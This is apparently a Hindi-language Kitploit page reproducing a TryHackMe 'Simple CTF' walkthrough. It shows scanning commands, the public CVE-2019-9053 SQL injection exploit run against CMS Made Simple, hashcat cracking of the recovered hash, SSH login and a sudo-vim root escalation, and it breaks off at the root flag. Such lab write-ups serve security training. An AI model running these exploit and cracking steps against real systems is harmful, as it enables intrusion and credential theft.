Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Simple-CTF-Writeup — पेशेवर TryHackMe Simple CTF वॉकथ्रू जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट कंप्रोमाइज़ शामिल है। | Kitploit
उपकरण/GitHubGitHub/imperialx1104/simple-ctf-writeup
पासवर्ड क्रैकिंगविशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubimperialx1104/simple-ctf-writeup

Simple-CTF-Writeup

पेशेवर TryHackMe Simple CTF वॉकथ्रू जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट कंप्रोमाइज़ शामिल है।

रिपॉजिटरी देखें
144 महीने पहलेअभी तक समीक्षित नहीं

सिंपल-सीटीएफ-राइटअप

TryHackMe Simple CTF का पेशेवर वॉकथ्रू, जिसमें एन्यूमरेशन, CMS Made Simple SQL इंजेक्शन (CVE-2019-9053), क्रेडेंशियल रिकवरी, SSH एक्सेस, Vim के माध्यम से प्रिविलेज एस्केलेशन और रूट से समझौता शामिल है।

TryHackMe - Simple CTF राइटअप

TryHackMe के Simple CTF रूम का एक संपूर्ण वॉकथ्रू, जिसमें रिकॉनिसेंस, एन्यूमरेशन, एक्सप्लॉइटेशन, क्रेडेंशियल रिकवरी, प्रिविलेज एस्केलेशन और फ्लैग कैप्चर शामिल हैं।


रूम की जानकारी

फ़ील्डमान
प्लेटफ़ॉर्मTryHackMe
रूम का नामSimple CTF
कठिनाईआसान
श्रेणीवेब एक्सप्लॉइटेशन और लिनक्स प्रिविलेज एस्केलेशन
लेखकSaahil Gupta (ImperialX1104)

उद्देश्य

इस रूम का लक्ष्य है:

  • लक्ष्य मशीन का एन्यूमरेशन करना
  • छिपी हुई सेवाओं और एप्लिकेशन की खोज करना
  • एक संवेदनशील CMS का शोषण करना
  • क्रेडेंशियल पुनर्प्राप्त करना
  • SSH एक्सेस प्राप्त करना
  • रूट तक प्रिविलेज एस्केलेशन करना
  • दोनों फ्लैग कैप्चर करना

अटैक अवलोकन

Host Discovery
      │
      ▼
Port Enumeration
      │
      ▼
Directory Enumeration
      │
      ▼
CMS Discovery
      │
      ▼
Version Identification
      │
      ▼
SQL Injection (CVE-2019-9053)
      │
      ▼
Credential Extraction
      │
      ▼
Password Cracking
      │
      ▼
SSH Access
      │
      ▼
User Flag
      │
      ▼
Privilege Escalation
      │
      ▼
Root Flag

रिकॉनिसेंस

होस्ट डिस्कवरी

पहला कदम लक्ष्य मशीन के साथ कनेक्टिविटी सत्यापित करना था।

कमांड

ping 10.49.175.174

परिणाम

होस्ट ने सफलतापूर्वक प्रतिक्रिया दी, जिससे पुष्टि हुई कि यह पहुंच योग्य है।

स्क्रीनशॉट

पिंग स्कैन


पोर्ट एन्यूमरेशन

खुली सेवाओं की पहचान करने के लिए एक व्यापक Nmap स्कैन किया गया।

कमांड

nmap -A -v 10.49.175.174

परिणाम

पोर्टसेवासंस्करण
21FTPvsftpd 3.0.3
80HTTPApache 2.4.18
2222SSHOpenSSH 7.2p2

उल्लेखनीय निष्कर्ष

  • अनाम (एनोनिमस) FTP लॉगिन सक्षम
  • Apache वेब सर्वर चालू
  • SSH पोर्ट 2222 पर उपलब्ध
  • robots.txt फ़ाइल खोजी गई

स्क्रीनशॉट

Nmap एन्यूमरेशन


वेब एन्यूमरेशन

लक्ष्य वेब सर्वर पर नेविगेट करने पर डिफ़ॉल्ट Apache लैंडिंग पेज प्रदर्शित हुआ।

URL

http://10.49.175.174

स्क्रीनशॉट

Apache डिफ़ॉल्ट पेज

इस चरण में कोई स्पष्ट अटैक सरफेस दिखाई नहीं दे रहा था।


डायरेक्टरी एन्यूमरेशन

छिपे हुए संसाधनों की पहचान के लिए, FFUF का उपयोग करके डायरेक्टरी ब्रूट-फोर्सिंग की गई।

कमांड

ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200

परिणाम

simple [Status: 301]

स्क्रीनशॉट

FFUF एन्यूमरेशन

/simple नामक एक डायरेक्टरी खोजी गई।


CMS की खोज

खोजी गई डायरेक्टरी पर ब्राउज़ करने से एक CMS इंस्टॉलेशन सामने आया।

URL

http://10.49.175.174/simple

स्क्रीनशॉट

CMS Made Simple

पहचाना गया CMS

CMS Made Simple 2.2.8

यह संस्करण संख्या बाद में महत्वपूर्ण साबित हुई।


भेद्यता अनुसंधान

CMS संस्करण पर SearchSploit का उपयोग करके शोध किया गया।

कमांड

searchsploit "CMS Made Simple"

परिणाम

CMS Made Simple < 2.2.10 - SQL Injection

स्क्रीनशॉट

SearchSploit परिणाम

एक ज्ञात SQL इंजेक्शन भेद्यता की पहचान की गई।


एक्सप्लॉइट प्राप्ति

विश्लेषण और निष्पादन के लिए एक्सप्लॉइट को स्थानीय रूप से कॉपी किया गया।

कमांड

searchsploit -m 46635

आउटपुट

CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

स्क्रीनशॉट

एक्सप्लॉइट डाउनलोड


एक्सप्लॉइटेशन

सार्वजनिक रूप से उपलब्ध एक्सप्लॉइट को लक्ष्य CMS इंस्टेंस के विरुद्ध निष्पादित किया गया।

कमांड

python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt

क्रेडेंशियल निष्कर्षण

एक्सप्लॉइट ने बैकएंड डेटाबेस से सफलतापूर्वक जानकारी निकाली।

आउटपुट

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

स्क्रीनशॉट

क्रेडेंशियल निष्कर्षण

पुनर्प्राप्त जानकारी

आइटममान
उपयोगकर्ता नामmitch
ईमेल[email protected]
सॉल्ट1dac0d92e9fa6bb2

पासवर्ड क्रैकिंग

निकाले गए हैश को Hashcat का उपयोग करके क्रैक किया गया।

कमांड

hashcat -m 20 hash.txt --show

आउटपुट

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

पुनर्प्राप्त क्रेडेंशियल

फ़ील्डमान
उपयोगकर्ता नामmitch
पासवर्डsecret

स्क्रीनशॉट

Hashcat पासवर्ड रिकवरी


प्रारंभिक एक्सेस

पुनर्प्राप्त क्रेडेंशियल का SSH सेवा पर परीक्षण किया गया।

कमांड

ssh [email protected] -p 2222

पासवर्ड

secret

परिणाम

Welcome to Ubuntu 16.04.6 LTS

स्क्रीनशॉट

SSH एक्सेस

सफल प्रमाणीकरण ने उपयोगकर्ता mitch के रूप में शेल एक्सेस प्रदान किया।


यूज़र फ्लैग

एक्सेस प्राप्त करने के बाद, यूज़र फ्लैग Mitch की होम डायरेक्टरी में स्थित पाया गया।

कमांड

whoami
cd ~
cat user.txt

आउटपुट

G00d j0b, keep up!

स्क्रीनशॉट

यूज़र फ्लैग


प्रिविलेज एस्केलेशन

सुडो एन्यूमरेशन

सुडो अनुमतियों की जाँच करने पर एक दिलचस्प कॉन्फ़िगरेशन का पता चला।

कमांड

sudo -l

आउटपुट

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

स्क्रीनशॉट

sudo -l आउटपुट

यह कॉन्फ़िगरेशन उपयोगकर्ता को पासवर्ड दिए बिना रूट विशेषाधिकारों के साथ Vim निष्पादित करने की अनुमति देता है।


रूट एक्सेस

रूट के रूप में Vim लॉन्च करना:

sudo vim

चूँकि Vim उन्नत विशेषाधिकारों के साथ चल रहा था, इसका उपयोग रूट के स्वामित्व वाली फ़ाइलों तक पहुँचने के लिए किया जा सकता था।

स्क्रीनशॉट

Vim के माध्यम से रूट एक्सेस


रूट फ्लैग

रूट फ्लैग रूट उपयोगकर्ता की डायरेक्टरी में स्थित था।

कमांड

टूल डाउनलोड करें